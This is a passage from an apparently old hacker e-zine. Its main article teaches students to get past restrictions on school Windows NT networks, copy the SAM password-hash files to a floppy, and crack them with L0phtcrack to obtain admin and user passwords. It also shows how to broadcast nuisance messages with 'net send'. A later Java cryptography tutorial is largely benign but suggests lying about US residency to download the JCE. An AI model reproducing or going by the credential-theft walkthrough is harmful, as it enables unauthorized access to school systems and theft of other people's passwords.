GetProcAddress and makes an inmemory-patch when the hook is called from a special location. Bad Religion, Sublime: To make you chill while your finding the offset. The most of the tools above is downloadable on www.protools.cjb.net Another good site to find tools is www.msjessca.da.ru where you will find SmartCheck. Contact Spyderco Psyops: ------------------------ ocredypS@usa.net www.dead-kennedys.com www.commecen.org ........[ Schools and NT ]........................[ Prosthetic ]............ ..Intro.. I have been asked this a lot and have seen posted on places "I want to get the admin password at school" or something like "I want to get everyone's passwords on my school's network" Well this is how to do just that but throw in a few tricks. ..SAM / SAM._ Files.. The two files you aim for first. If your school network doesnt allow the use of Windows Explorer or the viewing of your local hard drives and you dont know how to view them. Check ..Getting Windows Explorer.. near the end of my stuff. Anyway open up windows explorer and browse to c:\\\\winnt\\\\repair There you will see the file sam._ Whack in a floppy disk and copy the file to it. Now go and get yourself a copy of l0phtcrack (www.l0pht.com) and import this SAM._ file. Now if the passwords havent changed in the sam._ file that you just cracked you will be set and have the passwords otherwise you need the real shit and the main baby. This time windows explorer wont be so useful because when you goto copy the file it will say it is in use by the system. So if your lucky enough to be able to boot into MS-DOS mode. (if your school has half a brain hell no) you can simply goto c:\\\\winnt\\\\system32\\\\config and whack in a disk once again, yes the same disk (for some reason people ask use the same disk?) and simply do copy c:\\\\winnt\\\\system32\\\\config\\\\sam a:\\\\ Now once again grab your copy of L0phtcrack and choose File -> Import SAM File. Now it's cracking it wait until it's does and vwalla! Your passwords ready at your service which are recent and will work. Now if booting into MS-DOS isnt possible and you can reboot the machine once again, booting into MS-DOS is possible. Make yourself a Windows NT/9* boot disk and make sure it has NTFS on it. Stick the disk in while it's booting up and follow the above procedures. ..Getting Windows Explorer.. Most school networks i have seen Windows Explorer and MS-DOS have been taken out of the Start -> Programs menu. Here is how to get it again, not on your Programs menu but opened and useable. Open up your favourite web browser. Goto the URL and type c:\\\\winnt\\\\explorer.exe Now if it asks to save the file you can save it or open it from the current location. If you are on the type of network where you are given a drive allocated to save your data save it to there. because if you log onto a different computer you can just go and run the same file from there and it will open that computers local hard drive. ..MS-DOS Prompt.. Now we can do this one three ways. Do our explorer trick (if it is not in the Programs Menu) and goto the 3 places it would possibly be kept. c:\\\\ c:\\\\winnt c:\\\\winnt\\\\system32 I seem to see a lot that it's kept in the system32 folder. The three ways of doing it. 1. Open your web browser and type the path to the file. You may save it and do the same as explorer.exe either run it or save it. 2. Open Explorer everytime and keep going there everytime you want MS-DOS prompt. 3. Make a .bat file pointing to the file location so it runs in the one damn window. 3 is the best choice and (if you dont know how) here's how to do it. Basically say cmd.exe was kept in c:\\\\winnt\\\\system32 i would open up notepad and type in it... c:\\\\winnt\\\\system32\\\\cmd.exe Then MS-DOS prompt would open. Now all you need to do is simply run this BAT file each time. Same shit if you have a user space, save it there and you just run it if you change on different computers. ..Sending / Broadcasting Messages.. What is not liked at all is sending messages to other users while they are working or whatsoever. But whocares, damn, it's fun. Here's how to do it using NET.EXE which should become everyone's favourite toy. Open a MS-DOS window. Now here is the command line to run. Net send "message" For Example: Net send jak33 "fjear my pre$ence" This will just popup the message "fjear my pre$ence" on jak33's computer. Now if you are scared of getting caught by the admin and dont want to be logged off or your account disabled, whatever, fjear not.... It does show the computer name it came from and is traceable but i dont think the teacher/admin could give a real shit...The real place where the teachers/admin can give a shit is on an entire network where every computer gets that message popup. instead of the one user type in your main server's name instead for example: Net send school1 "whoops, i slipped on the wrong key" I have only tried this on 2 networks in which both have been successful. They were both running Novell Netware 5 with Windows NT Workstation on all the client computers. So dont complain if it doesnt do an entire network at once. I am outta here.... Peace. ........[ JCE ].......................................[ phunki ]............ Ok, this is the first part of a three part series on implementing cryptology in java using the JCE aka the Java Cryptology Extensions. Some knowledge of Java would be beneficial, but maybe if your smart or know other languages you'll be able to get by. No prior knowledge of cryptology is necessary, as this file will explain the relevant concepts. The other two files will be a bit more code intensive, and if you know about cryptology you may just want to skim this file and have a look at the code. nerf. Orright, lets rock ------------------------------------------------------------------------------ What is the JCE? The JCE is a set of classes released by Sun for the implementation of cryptology. It does a pretty good job at hiding the complexities of cryptology, so you dont have to worry too much about whats going on under the hood. You will need to have the JCE (or one of its variants) installed if you want to run the stuff in these files. Where can i get the JCE? The JCE is available for download from Sun's website, http://java.sun.com (or http://java.sun.com/products/jdk/1.2/jce/ i think). You may notice some scary mesages about being from the US to be able to download this, there are a few things you can do about this. First off, you can lie. Give a US adress (Sun's adress is conviently located at the bottom of its pages :) and postcode. The ban on cryptology exportation has been lifted (unless you're a jihad), but Sun hasn't felt the need to update its site, maybe they're lazy, maybe they're scared of terrorists, maybe they just dont care, oh well. If you feel bad about providing false information, the JCE is also available from http://www.wiretapped.net which also has lots of other interesting shit. Another option is to use a reimplementation of the JCE, created outside the US. Reimplentations? To get around the export ban, people in other countries developed their own implementations of the JCE using the documentation and plain old skill. One of the best of these would be Cryptix ( http://www.cryptix.org ) which also provides the source for its stuff, so you can have a bit of a play around. Cryptix supports a shitload more cipher algorithms and is the only other free provider aside from Sun. I personally had a bitch of a time installing it, and couldn't be fucked screwing round for a few hours trying to get java to recognise it, as Cryptix's documentation is somewhat sparse although this is being improved. All in all though id recommend using the offical JCE while your getting the hang of things. ---------------------------------------------------------------------------- Ok, lets have a look at some concepts. Keys If you take the view that encryption is what you use to lock your data away from prying eyes, you'll need a key to lock and unlock it. In practise, a key is (generally) a big ass string of characters used by whatever algorithm to encrypt and decrypt your data. One very common sort of key is the key pair, which is used in pgp and all over the shop. When you create a key pair you get a public key and a private key. The public key is just that, public, you should make this easily available for anyone to access. When someone wants to send you something encrypted, they will encrypt it using your public key. Data encrypted with a cerain public key can only be decrypted using its partner private key, generated at the same time. Your private key is also as its name implies, private. If someone gets your private key, they can decrypt data meant only for you, so keep it safe. There is another type of key, the session key. Session keys Just say you and me wanted to have a conversation over an encrypted network channel, we could create whats called a session key. This is like a private key from above, but we both use the same one to encrypt our conversation. If we have another conversation at a later date, we'd use a different key (another session, another key, session key, wow). A session key is whats called a symmetric cipher, whereas a key pair is an asymmetric cipher. Why have two different types? Well, there are some problems with symmetric ciphers, basically, if someone untrusted gets your key, your fucked. Thats why the public/private keys are a good way to encrypt data, because no-one at all has to know your private key, you dont have to transmit it over an insecure medium (maybe your connection is being sniffed, maybe your phone is tapped, how paranoid do you want to go? :) there are however implementation problems with asymmetric ciphers, that is they're kinda slow. They're great for encrypting email and "static" data, but to have a conversation of an encrypted network using an asymmetric cipher would be a bit of a pain in the ass to implement (There are some technical reasons for this i'll explain in a bit more detail later, see the section on symmetric block and stream ciphers below.). Ciphers So what are these ciphers? How do they work? First off we'll have a look at symmetric ciphers. It's where the same key is used to encrypt and decrypt a piece of data. When you type something out and it can be read, its called plain text. Once the plain text has been encrypted, you have whats called cipher text, which cant really be read unless you have the correct means to decrypt it (unless your the nsa or something :P) . Lets have a look at this diagramatically: Session Key Session Key \\\\------/ \\\\------/ plain text ----> Cipher -----> cipher text -----> Cipher ----> plain text /------\\\\ /------\\\\ Sender Network / Insecure Medium Receiver Ok, the sender first types out their message in plain text, then encrypts it using a cipher (encryption algorithm) and the session key, Now we have the cipher text, which can be sent safely across an insecure medium. Note that this can still be sniffed/intercepted, but would be of little use to anyone unless they have a few spare cray's lying around and a couple of centuries to kill. Once the cipher text reaches its destination, it is put through a cipher again to decrypt the message using the same key and out comes the plain text. This is an example of a symmetric cipher, as it uses the same key to encrypt and decrypt the data. Quicker, but the possiblity of compromise is greater. Lets have a look at how an asymmetric cipher works, with bob sending a messasge to al: Al's public Al's private key key Bob: \\\\-------/ \\\\-------/ Al: plain text ----> Cipher ---> cipher text ---> Cipher ----> plain text /-------\\\\ /-------\\\\ Sender Network / Insecure Medium Receiver Here, the sender, Bob, encrypts his message to Al using Al's public key. Once its been encrypted, its now safe for Bob to send it over an insecure medium, like the internet. Once Al receives it, he decrypts it using his private key, and can read the message: "lets go smash some shit!" el8! Bob and Al can now express there frustration at societys' ill's and their inability to make a difference, without fear of ASIO waiting for them, or Frank, their mutual loser friend with a penchant for packet sniffing, showing up un-invited. Ok, we'll have a look at some nuts and bolts of encryption then get into some code. A bit deeper into symmetric ciphers There are two types of symmetric ciphers, block ciphers and stream ciphers. Block ciphers encrypt and decrypt fixed size blocks of data, generally 64 bits. Stream ciphers operate on a stream of bits or bytes, and were the way encryption was accomplished before computers. When a block cipher is used, the message is broken into blocks and each block is encrypted and decrypted one at a time. Asymmetric ciphers are block ciphers, and are suited to things like encrypting emails or files, but if we wanted to have an encrypted channel through which we could talk to each other, a stream cipher would be more appropiate (eg, transmitting "Hi" or telnet commands would be quite ineffcient or awkward if we were using a block cipher) Padding When we do implement a block cipher, we cant rely on the fact that everything we type or want to encrypt will be in nice 64 bit blocks. Therefore, we can use what's called padding to fill out the rest of the block before it is encrypted. Throughout these files we'll be using PKCS#5 padding, which is a "standard" published by RSA Data Security. What this does is fill the leftover bytes in the plaintext block with the number of leftover bytes in the plaintext block. Sounds simple right? :) To understand this just pretend the 64 bit block is eight bytes (which it is, 8 bits in a byte, 8 bytes == 8 bits * 8 == 64 bits, but just bear with me) and we have five bytes of data in our final block, which leaves three bytes of empty space. In these leftover three bytes, we would use the value 3 to pad it out to the full 8 bytes. If we had 4 bytes used, leaving four bytes free, it would be padded out with the value 4. Here's a diagram to help you understand that a bit better: 5 bytes --------------------------------------------------------------- (3 bytes | blah | blah | blah | blah | blah | 3 | 3 | 3 | to pad) --------------------------------------------------------------- 4 bytes --------------------------------------------------------------- (4 bytes | blah | blah | blah | blah | 4 | 4 | 4 | 4 | to pad) --------------------------------------------------------------- 2 bytes --------------------------------------------------------------- (6 bytes | blah | blah | 6 | 6 | 6 | 6 | 6 | 6 | to pad) --------------------------------------------------------------- 0 bytes --------------------------------------------------------------- (8 bytes | 8 | 8 | 8 | 8 | 8 | 8 | 8 | 8 | to pad) --------------------------------------------------------------- In the last one, we see what happens if our plaintext block happens to end perfectly on a block boundary. To prevent any ambiguity when it comes to stripping the padding, an entire block of padding is added. Modes Each cipher needs a mode. A mode determines how the blocks of plaintext are encrypted into blocks of ciphertext and vice versa. The sun JCE supports ECB, CBC, CFB, OFB and PCBC modes. We'll only look at two of these modes, ECB in this part and CFB in a later part. The mode affects how resistant the ciphertext is to break. There's a trade off between robustness from transmission errors and the resistance of the ciphertext to being broken. Im not going to go too deep into modes, maybe in a later part, because modes and the different methods they use are a subject in themselves. ECB Mode ECB stands for Electronic Code Book, and is the simplest mode. Each block of plaintext encrypts into one block of ciphertext. A disadvantage of this is the same piece of plaintext will always encrypt into the same piece of ciphertext, which is a weakness that can be exploited by someone trying to break the encryption. (Eg if you're writing an email, the word "and" would appear numerous times, a pattern which could be easily picked up on and used to aid in breaking the encryption). One advantage of ECB is robustness when transmission errors occur. Using other modes, an error will affect subsequent blocks, but not so with ECB, its simplcity provides it a strength. Algorithms This is whats used to actually encrypt the data. Theres lots of them, and its way beyond the scope of this file to go into their internal workings. In reality, implementing crypto using the JCE doesn't really need any understanding of how the specific algorithms work, just a knowledge of which algorithm is best suited for a particular need. It's always good to know though, and a good book is Applied Cryptology by Bruce Schneier, which covers the math behind cryptology and also the state of it in the world. Just a one more thing to look at, then you'll be able to understand whats going on in the code. Base64 When we encrypt something in java, all we get is an array of raw encrypted bytes. Now, many mail programs and sometimes even the screen just cant handle raw bytes, so we need to convert the byte arrays to ASCII before we can display/send the encrypted message. Base64 is a handy way to do this. It's system is fully described in RFC1521 sec 5.2, but Java contains two undocumented classes that will handle base64 encoding and decoding for us. These are sun.misc.BASE64Encoder (takes an array of bytes and generates a string) and sun.misc.BASE64Decoder (takes a string and generates an array of bytes).All we'll be using it for is to create easily readable strings. Fuck yeah, lets rock /***************************************************************************** * Ok, we're just gonna get a feel for how the JCE is used. This will take a * string and encrypt or decrypt it. With a little effort, you could make it * take a filename as an argument, and encrypt the whole file. All in all, this * is relatively basic when compared to whats gonna be in the later parts :D * * First off, we get or create a key, which will be read from a file. Then we * create a cipher object, in this case it will be the DES algorithm using ECB * mode and PKCS#5 padding (called PKCS5Padding internally by java). Once that's * done, we'll bang a string through it and print the output to the screen. how * exciting. *******************************************************************************/ import java.io.*; import java.security.*; import javax.crypto.*; //YEAH! import sun.misc.*; //for our base64 stuff public class BasicCrypt { public static void main(String[] args) throws Exception { //check the arguments if (args.length < 2) { System.out.println("Usage: BasicCrypt <-e | -d> "); return; } /****************************************************************************** * Now we're going to first see if a key exists and open it if it does, * otherwise we'll create a new one using DES. This can take a minute so dont * stress if it seems like it's hung. If you have a key already and would like * to use it, _make a copy_ and put it in the directory your running this from. * Make a copy, i will not accept any responsibilty if you lose your key or it * gets fucked over by the file i/o. If you dont like that, dont run the * program. ******************************************************************************/ Key key; try { //copy your damn key ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("myKeyCopy.ser")); //read in the key key = (Key)inputStream.readObject(); //close the input stream, if you dont do this, you'll lose your key inputStream.close(); } //if they dont have a key, make a new one catch (FileNotFoundException e) { //mmm, user-friendly System.out.println("No existing key found, generating new one"); //we want our new key to use DES KeyGenerator keyGen = KeyGenerator.getInstance("DES"); //get a realish random number keyGen.init(new SecureRandom()); //now hows this for simple key = keyGen.generateKey(); //we want to save our key for future use, so we write it to a file ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("myKeyCopy.ser")); outputStream.writeObject(key); outputStream.close(); } /******************************************************************************* * Ok, so now we have our key, we'll create a cipher object so we can encrypt our * data, we're going to use DES with PCKS#5 padding and mode ECB. Pretty easy as * you'll see. *******************************************************************************/ //mmm, challenge Cipher ourCipher = Cipher.getInstance("DES/ECB/PKCS5Padding"); /******************************************************************************* * So now we have our cipher instance and our key, we'll check our args to see if * we should be encypting or decrypting the data. e for encrypt, d for decrypt. *******************************************************************************/ //if we want to encrypt if (args[0].indexOf("e") != -1) { //tell java we want to encrypt and to get ready, using our already //initialised cipher and key ourCipher.init(Cipher.ENCRYPT_MODE, key); //get what we want to encrypt String textToEncrypt = args[1]; //get the rest of the words to encrypt, which would've been stored //as extra args for (int i = 2; i < args.length; i++) { textToEncrypt += " " + args[i]; } //now create our byte array and give it our string byte[] textBytes = textToEncrypt.getBytes("UTF8"); //Encrypt that mofo byte[] crypted = ourCipher.doFinal(textBytes); //ok, nows its been encrypted, we'll use base64 and print it out to //the screen BASE64Encoder b64Encoder = new BASE64Encoder(); //a string to put the base64 encoded stuff, remember crypted is our //encrypted byte array String printTemp = b64Encoder.encode(crypted); //now print it out System.out.println(printTemp); } //now if we want to decrypt a string else if (args[0].indexOf("d") != -1) { //tell java we want to decrypt, and get it all ready ourCipher.init(Cipher.DECRYPT_MODE, key); //Get our decoder ready BASE64Decoder b64Decoder = new BASE64Decoder(); // our encrypted string, it will be one long string, hence only //using args[1] byte[] crypted = b64Decoder.decodeBuffer(args[1]); //now decrypt the bastard byte[] textBytes = ourCipher.doFinal(crypted); //pretty simple eh //now we'll print our decrypted string to the screen String printTemp = new String(textBytes, "UTF8"); System.out.println(printTemp); }//end else if }// end main }// end class ------------------------------------------------------------------------------ That wasn't too bad now was it. Notice how the encrypt and decrypt methods ourCipher.doFinal() were the same regardless, encryption or decryption is specified in the line ourCipher.init(Cipher.ENCRYPT_MODE, key); or ourCipher.init(Cipher.DECRYPT_MODE, key) the init method needs a cipher and a key, which is why they were created first. Using UTF8 ensures our program is cross-platform portable, but you can use the default without specifying an encoding by simply calling getBytes() with no arguments. Well, thats about it for now, part's 2 and 3 should be about soonish and we'll get into a lot more code and start doing some cool stuff. lovingly yours, phunki v0idnull@yahoo.com Some Good Books Java Specific Java Cryptography by Jonathan Knudsen published by O'Reilly - All you'd ever want to know about Java Cryptography, a lot of the code you'll see here is based on the stuff in this book. good book Java Security by Scott Oaks published by O'Reilly - Covers the entire Java Security API, dont have it, cant comment Java - An Introduction to Computer Science & Programming by Walter Savitch published by Prentice Hall - A good book for learning Java. As much as i hate java, its good for getting to know the Object Orientated Paradigm, and a little less cryptic than C/C++ Cryptography Specific Applied Cryptography by Bruce Schneier published by Wiley - This book is sort of like TCP/IP Illustrated for crypto, well worth a read Handbook of Applied Cryptology by Alfred J. Menzies published by CRC Press - Covers crypto math, dont have it, haven't read it, cant comment Other ICQ for Dummies - honestly, if i ever saw someone looking at this book, i think id save them some time and kill them there and then. ........[ Outro ].................................[ phase5 ]............ wang . EOF .